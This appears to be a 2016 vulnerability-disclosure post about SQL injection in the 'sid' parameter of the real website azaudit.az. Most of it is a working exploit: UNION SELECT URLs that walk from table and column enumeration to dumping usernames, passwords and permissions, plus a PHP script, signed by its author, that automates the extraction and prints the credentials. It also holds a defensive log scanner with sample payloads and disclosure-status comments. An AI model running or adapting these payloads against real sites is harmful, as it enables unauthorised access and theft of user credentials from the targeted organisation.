Azaudit.az sid parameter SQL Injection

Azaudit.az 20 June 2016, 03:14

Detailed information

http://www.azaudit.az/?l=az&sid=18' # SQL vulnerability
http://www.azaudit.az/?l=az&sid=-18' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- -' # The column number is 11
http://www.azaudit.az/?l=az&sid=-18' UNION SELECT 1,2,3,4,5,6,7,8,9,10,version(),12,13-- -' # version <5. However, when pulling the table_names, they are returned from column 1 rather than column 11, so we set column 11 to null and put the group_concat(table_name) expression in column 1
http://www.azaudit.az/?sid=-18%27 UNION SELECT group_concat(table_name),2,3,4,5,6,7,8,9,10,null,12,13 from information_schema.tables where table_schema=database()--+-'&l=az # No value appears directly on the screen. Around the middle of the page there are Services and About links; by hovering over the About link, the table_names can be seen in the HTML code
http://www.azaudit.az/?sid=-18%27%20UNION%20SELECT%20group_concat%28column_name%29,2,3,4,5,6,7,8,9,10,null,12,13%20from%20information_schema.columns%20where%20table_name=0x617a615f6d655f7573657273--+-%27 # As above, the column_names can be seen by hovering over the link or by finding the relevant line in the HTML code
Finally
http://www.azaudit.az/?l=az&sid=-18%27%20UNION%20SELECT%20group_concat%28username,0x3a,password,0x3a,permissions%29,2,3,4,5,6,7,8,9,10,group_concat%28username,0x3a,password,0x3a,permissions%29,12,13%20from%20aza_me_users--%20-%27 # To view the data in the username, password and permissions columns
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
So that it would not be too much trouble, I wrote a PHP script that prints the table_names, column_names, and the username and password straight to the screen; using it, you can see them without looking at the HTML code
################



<?php
/*
Coded By Marshall
21.06.2016 03:15
*/

$table = file_get_contents("http://www.azaudit.az/?sid=-18%27%20UNION%20SELECT%20group_concat%28table_name%29,2,3,4,5,6,7,8,9,10,null,12,13%20from%20information_schema.tables%20where%20table_schema=database%28%29--+-%27&l=az");
$column = @file_get_contents("http://www.azaudit.az/?sid=-18%27%20UNION%20SELECT%20group_concat%28column_name%29,2,3,4,5,6,7,8,9,10,null,12,13%20from%20information_schema.columns%20where%20table_name=0x617a615f6d655f7573657273--+-%27");
$sayt = file_get_contents("http://www.azaudit.az/?l=az&sid=-18%27%20UNION%20SELECT%20group_concat%28username,0x3a,password,0x3a,permissions%29,2,3,4,5,6,7,8,9,10,group_concat%28username,0x3a,password,0x3a,permissions%29,12,13%20from%20aza_me_users--%20-%27");
##################################################################
preg_match_all("@<a href='(.*?)'>@si" ,$sayt,$salam);
$exp_1 = explode("<a href='?sid=",$salam[0][28]);// To split off the HTML tags
$login = explode(":", $exp_1[1]);
##################################################################
##################################################################
preg_match_all("@<a href='(.*?)'>@si" ,$table,$salam);
$exp_1 = explode("<a href='?sid=",$salam[0][28]);// To split off the HTML tags
$names1 = explode(",", $exp_1[1]);
$tables = explode("&", $names1[8]);
##################################################################
preg_match_all("@<a href='(.*?)'>@si" ,$column,$salam);
$exp_1 = explode("<a href='?sid=",$salam[0][28]);// To split off the HTML tags
$names = explode(",", $exp_1[1]);
$columns = explode("&", $names[3]);
#################################################################
echo "<h4><font color='red'>Table_Name</font></h4><br>";
echo "1: ".$names1[0]."<br>";
echo "2: ".$names1[1]."<br>";
echo "3: ".$names1[2]."<br>";
echo "4: ".$names1[3]."<br>";
echo "5: ".$names1[4]."<br>";
echo "6: ".$names1[5]."<br>";
echo "7: ".$names1[6]."<br>";
echo "8: ".$tables[0]."<br><hr/>";
#################################################################
echo "<h4><font color='red'>Column_Name</font></h4><br>";
echo "1: ".$names[0]."<br>";
echo "2: ".$names[1]."<br>";
echo "3: ".$names[2]."<br>";
echo "4: ".$columns[0]."<br><hr/>";
#################################################################
echo "<h4>Username : <font color='red'>".$login[0]."</font></h4><br>";
echo "<h4>Password : <font color='red'>".$login[1]."</font></h4><br>";

?>


#################
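
A defender-side check for the requests listed above, as an added example that is not part of the original report: it scans web access-log lines and flags every request whose `sid` value is not a plain integer, labelling it by the SQL keywords it contains. The log format, the client addresses (192.0.2.x documentation range), the shortened sample requests and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in common log format (not taken from any real server).
SAMPLE_LOG = """\
192.0.2.10 - - [20/Jun/2016:03:01:11 +0400] "GET /?l=az&sid=18 HTTP/1.1" 200 5120
192.0.2.44 - - [20/Jun/2016:03:02:40 +0400] "GET /?l=az&sid=18' HTTP/1.1" 200 312
192.0.2.44 - - [20/Jun/2016:03:03:02 +0400] "GET /?l=az&sid=-18'%20UNION%20SELECT%201,2,3--%20- HTTP/1.1" 200 5300
192.0.2.44 - - [20/Jun/2016:03:05:19 +0400] "GET /?sid=-18%27%20UNION%20SELECT%20group_concat%28table_name%29,2%20from%20information_schema.tables--+-%27&l=az HTTP/1.1" 200 6100
"""

# Labels are checked in order, most specific first.
STAGES = [
    ("schema-enumeration", re.compile(r"information_schema", re.I)),
    ("union-select", re.compile(r"union\s+(all\s+)?select", re.I)),
    ("quote-probe", re.compile(r"['\"]")),
]

# Client address and request target from one common-log-format line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def classify_sid(value):
    """Return None for a plain integer id, otherwise a label for the anomaly."""
    if re.fullmatch(r"\d+", value):
        return None
    for label, pattern in STAGES:
        if pattern.search(value):
            return label
    return "non-integer"


def scan(log_text):
    """Return (client, label, decoded sid) for every suspicious sid value."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs URL-decodes the value, so %27 and a literal ' are treated alike.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in params.get("sid", []):
            label = classify_sid(value)
            if label:
                findings.append((client, label, value))
    return findings


if __name__ == "__main__":
    for client, label, value in scan(SAMPLE_LOG):
        print(f"{client}\t{label}\t{value}")
```

The same integer-only rule belongs in the application itself: validate or cast `sid` to an integer and pass it to the database as a bound parameter rather than concatenating it into the query.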

Comments

  • 21 October 2016, 13:51
    Vulnerability status
    No information from the source

  • 22 August 2016, 09:58
    Vulnerability status
    Sent e-mail to the source about the vulnerability

  • 21 June 2016, 13:43
    Points added to vulnerability
    Moderator gave the vulnerability 8 points out of 10

  • 21 June 2016, 13:43
    Vulnerability status
    Confirmed by Moderator

  • 20 June 2016, 03:14
    Vulnerability added
    Vulnerability added to BUGemot